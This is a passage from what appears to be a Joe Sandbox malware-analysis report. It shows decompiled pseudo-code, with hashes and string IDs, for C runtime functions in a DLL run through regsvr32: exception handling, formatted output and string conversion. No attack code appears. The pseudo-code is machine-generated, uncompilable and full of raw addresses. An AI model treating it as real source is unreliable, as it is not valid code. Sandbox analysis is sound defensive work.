                                                                                				_v168 = E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40);
                                                                                				if (_v168 - 0xffffffff < 0) goto 0x524741b1;
                                                                                				if (_v168 - _a40[1] >= 0) goto 0x524741b1;
                                                                                				goto 0x524741b6;
                                                                                				_t222 = E00007FFA7FFA5246CF80(_a40);
                                                                                				if ( *_a8 != 0xe06d7363) goto 0x52474398;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x52474398;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x52474213;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x52474213;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x52474398;
                                                                                				_t302 = _a8;
                                                                                				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0x52474398;
                                                                                				0x52464000();
                                                                                				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0x5247423a;
                                                                                				goto 0x52474862;
                                                                                				0x52464000();
                                                                                				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                                                				_a8 = _t303;
                                                                                				0x52464000();
                                                                                				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                                                				_v164 = 1;
                                                                                				E00007FFA7FFA5246E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                                                				if (E00007FFA7FFA5247D2C0(1, _a8) == 0) goto 0x52474290;
                                                                                				goto 0x52474295;
                                                                                				E00007FFA7FFA5246CF80(_a8);
                                                                                				if ( *_a8 != 0xe06d7363) goto 0x524742fa;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x524742fa;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x524742e6;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x524742e6;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x524742fa;
                                                                                				_t311 = _a8;
                                                                                				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0x524742fa;
                                                                                				E00007FFA7FFA5246CF80(_t311);
                                                                                				0x52464000();
                                                                                				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0x52474398;
                                                                                				0x52464000();
                                                                                				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                                                				_v144 = _t312;
                                                                                				0x52464000();
                                                                                				 *((long long*)(_t312 + 0x108)) = 0;
                                                                                				if ((E00007FFA7FFA52475BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0x52474349;
                                                                                				goto 0x52474398;
                                                                                				if ((E00007FFA7FFA52475CC0(_v144) & 0x000000ff) == 0) goto 0x52474393;
                                                                                				E00007FFA7FFA52475AB0(1, _a8);
                                                                                				E00007FFA7FFA52474870( &_v56, "bad exception");
                                                                                				E00007FFA7FFA5247D320(__edi, __esi, __esp,  &_v56, 0x5248a180);
                                                                                				goto 0x52474398;
                                                                                				E00007FFA7FFA5246CF50(_t312);
                                                                                				if ( *_a8 != 0xe06d7363) goto 0x524747d9;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x524747d9;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x524743f5;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x524743f5;
                                                                                				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x524747d9;
                                                                                				if (_a40[3] <= 0) goto 0x5247466c;
                                                                                				_v216 = _a32;
                                                                                				_v224 =  &_v132;
                                                                                				_t321 =  &_v136;
                                                                                				_v232 = _t321;
                                                                                				r9d = _v168;
                                                                                				r8d = _a56;
                                                                                				E00007FFA7FFA5246EA30(_a16, _a40);
                                                                                				_v128 = _t321;
                                                                                				goto 0x5247447e;
                                                                                				_v136 = _v136 + 1;
                                                                                				_v128 = _v128 + 0x14;
                                                                                				if (_v136 - _v132 >= 0) goto 0x5247466c;
                                                                                				if ( *_v128 - _v168 > 0) goto 0x524744b3;
                                                                                				_t325 = _v128;
                                                                                				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0x524744b5;
                                                                                				goto 0x5247445a;
                                                                                				E00007FFA7FFA5246E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                                                				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                                                				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                                                				_v120 = _v120 - 1;
                                                                                				_t329 = _v112 + 0x14;
                                                                                				_v112 = _t329;
                                                                                				if (_v120 <= 0) goto 0x52474667;
                                                                                				_t244 = E00007FFA7FFA5246E6A0(_v120 - 1, _t329);
                                                                                				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                                                				_v96 = _t330;
                                                                                				E00007FFA7FFA5246E6A0(_t244, _t330);
                                                                                				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                                                				goto 0x5247457e;
                                                                                				_v104 = _v104 - 1;
                                                                                				_t332 = _v96 + 4;
                                                                                				_v96 = _t332;
                                                                                				if (_v104 <= 0) goto 0x52474662;
                                                                                				E00007FFA7FFA5246E6A0(_v104 - 1, _t332);
                                                                                				_v88 = _t332 +  *_v96;
                                                                                				if (E00007FFA7FFA52474CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0x524745ce;
                                                                                				goto 0x5247455a;
                                                                                				_v152 = 1;
                                                                                				_v176 = _a48 & 0x000000ff;
                                                                                				_v184 = _v164 & 0x000000ff;
                                                                                				_v192 = _a64;
                                                                                				_v200 = _a56;
                                                                                				_v208 = _v128;
                                                                                				_v216 = _v88;
                                                                                				_v224 = _v112;
                                                                                				_v232 = _a40;
                                                                                				E00007FFA7FFA52475180(__edi, __esi, __esp, E00007FFA7FFA52474CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                                                				goto 0x52474667;
                                                                                				goto 0x5247455a;
                                                                                				goto L1;
                                                                                				goto 0x5247445a;
                                                                                				__eax = _v152 & 0x000000ff;
                                                                                				__eflags = _v152 & 0x000000ff;
                                                                                				if ((_v152 & 0x000000ff) != 0) goto 0x524747d7;
                                                                                				__rax = _a40;
                                                                                				__eax =  *_a40;
                                                                                				__eax =  *_a40 & 0x1fffffff;
                                                                                				__eflags = __eax - 0x19930521;
                                                                                				if (__eax - 0x19930521 < 0) goto 0x524747d7;
                                                                                				__rax = _a40;
                                                                                				__eflags =  *(__rax + 0x20);
                                                                                				if ( *(__rax + 0x20) == 0) goto 0x524746bf;
                                                                                				__eax = E00007FFA7FFA5246E680(__eax, __rax);
                                                                                				_a40 = _a40[8];
                                                                                				_v32 = __rax;
                                                                                				goto 0x524746cb;
                                                                                				_v32 = 0;
                                                                                				__eflags = _v32;
                                                                                				if (_v32 == 0) goto 0x524747d7;
                                                                                				__rax = _a40;
                                                                                				__eflags =  *(__rax + 0x20);
                                                                                				if ( *(__rax + 0x20) == 0) goto 0x52474706;
                                                                                				__eax = E00007FFA7FFA5246E680(__eax, __rax);
                                                                                				_a40 = _a40[8];
                                                                                				__rax = __rax + _a40[8];
                                                                                				_v24 = __rax;
                                                                                				goto 0x52474712;
                                                                                				_v24 = 0;
                                                                                				__rdx = _v24;
                                                                                				__rcx = _a8;
                                                                                				E00007FFA7FFA52475BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                                                				__eflags = __al & 0x000000ff;
                                                                                				if ((__al & 0x000000ff) != 0) goto 0x524747d7;
                                                                                				__rax = _a16;
                                                                                				_v64 = _a16;
                                                                                				__r9 =  &_v80;
                                                                                				__r8 = _a40;
                                                                                				__rdx = _a32;
                                                                                				__rcx = _a16;
                                                                                				__eax = E00007FFA7FFA5246E500(_a16, _a32, _a40,  &_v80);
                                                                                				_v64 = __rax;
                                                                                				_v72 = 0;
                                                                                				__eax = _a48 & 0x000000ff;
                                                                                				_v200 = __al;
                                                                                				__rax = _a32;
                                                                                				_v208 = _a32;
                                                                                				__rax = _a40;
                                                                                				_v216 = _a40;
                                                                                				_v224 = 0xffffffff;
                                                                                				_v232 = 0;
                                                                                				__r9 = _v64;
                                                                                				__r8 = _a24;
                                                                                				__rdx = _a8;
                                                                                				__rcx = _a16;
                                                                                				__eax = E00007FFA7FFA5246EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                                                				goto 0x5247484c;
                                                                                				__rax = _a40;
                                                                                				__eflags =  *(__rax + 0xc);
                                                                                				if ( *(__rax + 0xc) <= 0) goto 0x5247484c;
                                                                                				__eax = _a48 & 0x000000ff;
                                                                                				__eflags = _a48 & 0x000000ff;
                                                                                				if ((_a48 & 0x000000ff) != 0) goto 0x52474847;
                                                                                				__rax = _a64;
                                                                                				_v208 = _a64;
                                                                                				__eax = _a56;
                                                                                				_v216 = _a56;
                                                                                				__eax = _v168;
                                                                                				_v224 = _v168;
                                                                                				__rax = _a40;
                                                                                				_v232 = _a40;
                                                                                				__r9 = _a32;
                                                                                				__r8 = _a24;
                                                                                				__rdx = _a16;
                                                                                				__rcx = _a8;
                                                                                				__eax = E00007FFA7FFA52474960(__ecx, _a8, _a16, _a24, _a32);
                                                                                				goto 0x5247484c;
                                                                                				__eax = E00007FFA7FFA5246CF50(__rax);
                                                                                				0x52464000();
                                                                                				__eflags =  *((long long*)(__rax + 0x108));
                                                                                				if ( *((long long*)(__rax + 0x108)) != 0) goto 0x5247485d;
                                                                                				goto 0x52474862;
                                                                                				return E00007FFA7FFA5246CF80(__rax);
                                                                                			}











































                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                                                • String ID: bad exception$csm$csm$csm
                                                                                • API String ID: 3498492519-820278400
                                                                                • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                • Instruction ID: d68a8f5bf1cf7aabe3f48176a1a7db2c9daf2d8e551943e3841baff8ee825e79
                                                                                • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                • Instruction Fuzzy Hash: 5D12E636A0CAC585DA709B55E8403EAB7F0FB8AB44F488136DA9D47B99DFBCD441CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                                                • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 4023976971-2293733425
                                                                                • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                • Instruction ID: 0eb0018df15fb8da22abb3d5b5c5495e6d5614e82b4df161906bc1ffcf102b53
                                                                                • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                                • Instruction Fuzzy Hash: 88025E7290C6C68AE7708B14E8543AA77F4FB86344F488135D6AC46AADDFBCE546CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                                                • API String ID: 530996419-3695252689
                                                                                • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                • Instruction ID: 19b1d432ba0df062b455274afaf5457d84f7af1d90f8a9d6785ea9cff5ac811e
                                                                                • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                                • Instruction Fuzzy Hash: DDD1183251CAC585D7609B15E84036EB7B0FB85790F088636E6AE87BE9DFBCE445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                                                • API String ID: 2192614184-1854130327
                                                                                • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                • Instruction ID: 4ce84f4a91b1e04673511f84c68a9050bf1db43f7b95567593b4ef2e92a252b8
                                                                                • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                                • Instruction Fuzzy Hash: 5FC1293290C68686E7709B10E8543AA73F0FB92744F588135E69D87A9ECFBCE845CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-1870338870
                                                                                • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                • Instruction ID: 2c693d248327901a784e86a4ab3db794ac27c9b9895a2314bdbda2460ec5527c
                                                                                • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                • Instruction Fuzzy Hash: 45D1187291CA86CAE7708B10E8443AB76F0FB86349F488135D69C47A9DDBBDE445CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E00007FFA7FFA5247C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                				signed int _t223;
                                                                                				signed char _t228;
                                                                                				intOrPtr _t263;
                                                                                				signed int _t338;
                                                                                				signed int _t339;
                                                                                				signed long long _t342;
                                                                                				intOrPtr* _t365;
                                                                                				signed long long _t390;
                                                                                
                                                                                				_t338 = __rax;
                                                                                				_a80 = _a80 | 0x00000040;
                                                                                				_a72 = 0xa;
                                                                                				_a72 = 0xa;
                                                                                				_a116 = 0x10;
                                                                                				asm("bts eax, 0xf");
                                                                                				_a708 = 7;
                                                                                				_a708 = 0x27;
                                                                                				_a72 = 0x10;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
                                                                                				_a84 = 0x30;
                                                                                				_a85 = _a708 + 0x51;
                                                                                				_a92 = 2;
                                                                                				_a72 = 8;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
                                                                                				asm("bts eax, 0x9");
                                                                                				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t338;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t338;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
                                                                                				_t339 = E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t339;
                                                                                				goto 0x5247c80e;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t339;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t339;
                                                                                				goto 0x5247c84b;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t339;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
                                                                                				if (_a824 >= 0) goto 0x5247c882;
                                                                                				_a832 =  ~_a824;
                                                                                				asm("bts eax, 0x8");
                                                                                				goto 0x5247c892;
                                                                                				_t342 = _a824;
                                                                                				_a832 = _t342;
                                                                                				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
                                                                                				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
                                                                                				_a832 = _a832 & _t342;
                                                                                				if (_a116 >= 0) goto 0x5247c8d8;
                                                                                				_a116 = 1;
                                                                                				goto 0x5247c8f5;
                                                                                				_a80 = _a80 & 0xfffffff7;
                                                                                				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
                                                                                				_a116 = 0x200;
                                                                                				if (_a832 != 0) goto 0x5247c908;
                                                                                				_a92 = 0;
                                                                                				_a64 =  &_a687;
                                                                                				_t223 = _a116;
                                                                                				_a116 = _a116 - 1;
                                                                                				if (_t223 > 0) goto 0x5247c936;
                                                                                				if (_a832 == 0) goto 0x5247c9d3;
                                                                                				_a1040 = _a72;
                                                                                				_a816 = _t223 / _a1040 + 0x30;
                                                                                				_a1048 = _a72;
                                                                                				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
                                                                                				_t228 = _a816 + _a708;
                                                                                				_a816 = _t228;
                                                                                				 *_a64 = _a816 & 0x000000ff;
                                                                                				_a64 = _a64 - 1;
                                                                                				goto 0x5247c915;
                                                                                				_a104 = _t228;
                                                                                				_a64 = _a64 + 1;
                                                                                				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
                                                                                				if (_a104 == 0) goto 0x5247ca12;
                                                                                				if ( *_a64 == 0x30) goto 0x5247ca31;
                                                                                				_a64 = _a64 - 1;
                                                                                				 *_a64 = 0x30;
                                                                                				_a104 = _a104 + 1;
                                                                                				if (_a108 != 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
                                                                                				_a84 = 0x2d;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
                                                                                				_a84 = 0x2b;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
                                                                                				_a84 = 0x20;
                                                                                				_a92 = 1;
                                                                                				_a840 = _a88 - _a104 - _a92;
                                                                                				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
                                                                                				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
                                                                                				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
                                                                                				if (_a76 == 0) goto 0x5247cc1d;
                                                                                				if (_a104 <= 0) goto 0x5247cc1d;
                                                                                				_a872 = 0;
                                                                                				_a848 = _a64;
                                                                                				_a856 = _a104;
                                                                                				_a856 = _a856 - 1;
                                                                                				if (_a856 == 0) goto 0x5247cc1b;
                                                                                				_a1056 =  *_a848 & 0x0000ffff;
                                                                                				r9d = _a1056 & 0x0000ffff;
                                                                                				r8d = 6;
                                                                                				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
                                                                                				_a848 =  &(_a848[1]);
                                                                                				if (_a872 != 0) goto 0x5247cbe5;
                                                                                				if (_a860 != 0) goto 0x5247cbf2;
                                                                                				_a688 = 0xffffffff;
                                                                                				goto 0x5247cc1b;
                                                                                				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                				goto 0x5247cb60;
                                                                                				goto 0x5247cc3b;
                                                                                				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                				if (_a688 < 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				if (_a96 == 0) goto 0x5247cc8e;
                                                                                				0x52465330();
                                                                                				_a96 = 0;
                                                                                				goto 0x5247b99c;
                                                                                				if (_a704 == 0) goto 0x5247ccb4;
                                                                                				if (_a704 == 7) goto 0x5247ccb4;
                                                                                				_a1060 = 0;
                                                                                				goto 0x5247ccbf;
                                                                                				_a1060 = 1;
                                                                                				_t263 = _a1060;
                                                                                				_a876 = _t263;
                                                                                				if (_a876 != 0) goto 0x5247cd05;
                                                                                				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                				_a32 = _t365;
                                                                                				r9d = 0;
                                                                                				r8d = 0x8f5;
                                                                                				0x5246b3b0();
                                                                                				if (_t263 != 1) goto 0x5247cd05;
                                                                                				asm("int3");
                                                                                				if (_a876 != 0) goto 0x5247cd61;
                                                                                				0x5246ab30();
                                                                                				 *_t365 = 0x16;
                                                                                				_a32 = 0;
                                                                                				r9d = 0x8f5;
                                                                                				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                				_a912 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				goto 0x5247cd80;
                                                                                				_a916 = _a688;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                			}












                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg$wctomb_s
                                                                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2984758162-268265396
                                                                                • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                • Instruction ID: 39af7d46ab4fb164243604a0a838afa6f9ec754845abf7f102bd482586d1d0b5
                                                                                • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                • Instruction Fuzzy Hash: 5902E67360CAC58AE7718B14E8853AAB7F4E786740F184135E6AD86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                                                • API String ID: 2192614184-660564692
                                                                                • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                • Instruction ID: 213f97a32b66ff47d8712bf5a4b9df3925e880c35c0c515629177ed81c7d9700
                                                                                • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                • Instruction Fuzzy Hash: 23E1293290CBC685E7709B14E8443AA63F1FB86794F588635D6AD52ADCDFBCE485CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00007FFA7FFA524755F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                                                				long long _v24;
                                                                                				long long _v32;
                                                                                				long long _v40;
                                                                                				long long _v48;
                                                                                				long long _v56;
                                                                                				void* _v64;
                                                                                				long long _v72;
                                                                                				void* _t88;
                                                                                				void* _t89;
                                                                                				void* _t107;
                                                                                				void* _t109;
                                                                                				signed int* _t158;
                                                                                				signed int* _t160;
                                                                                				long long _t175;
                                                                                				long long _t186;
                                                                                				signed int* _t187;
                                                                                				signed int* _t193;
                                                                                
                                                                                				_a32 = __r9;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				_v72 = 0;
                                                                                				_t158 = _a24;
                                                                                				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0x52475639;
                                                                                				_t89 = E00007FFA7FFA5246E680(_t88, _t158);
                                                                                				_v56 = _t158 + _a24[1];
                                                                                				goto 0x52475642;
                                                                                				_v56 = 0;
                                                                                				if (_v56 == 0) goto 0x524756aa;
                                                                                				_t160 = _a24;
                                                                                				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0x52475673;
                                                                                				E00007FFA7FFA5246E680(_t89, _t160);
                                                                                				_v48 = _t160 + _a24[1];
                                                                                				goto 0x5247567c;
                                                                                				_v48 = 0;
                                                                                				if ( *((char*)(_v48 + 0x10)) == 0) goto 0x524756aa;
                                                                                				if (_a24[2] != 0) goto 0x524756b1;
                                                                                				if (( *_a24 & 0x80000000) != 0) goto 0x524756b1;
                                                                                				goto 0x52475966;
                                                                                				if (( *_a24 & 0x80000000) == 0) goto 0x524756d0;
                                                                                				_v64 = _a16;
                                                                                				goto 0x524756e9;
                                                                                				_v64 = _a24[2] +  *_a16;
                                                                                				if (( *_a24 & 0x00000008) == 0) goto 0x52475765;
                                                                                				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x5247575b;
                                                                                				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x5247575b;
                                                                                				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                                                				_t175 = _v64;
                                                                                				E00007FFA7FFA52475B30(_t100,  *_t175,  &(_a32[2]));
                                                                                				 *_v64 = _t175;
                                                                                				goto 0x52475760;
                                                                                				E00007FFA7FFA5246CF80(_t175);
                                                                                				goto 0x5247595a;
                                                                                				if (( *_a32 & 0x00000001) == 0) goto 0x52475813;
                                                                                				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x52475809;
                                                                                				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x52475809;
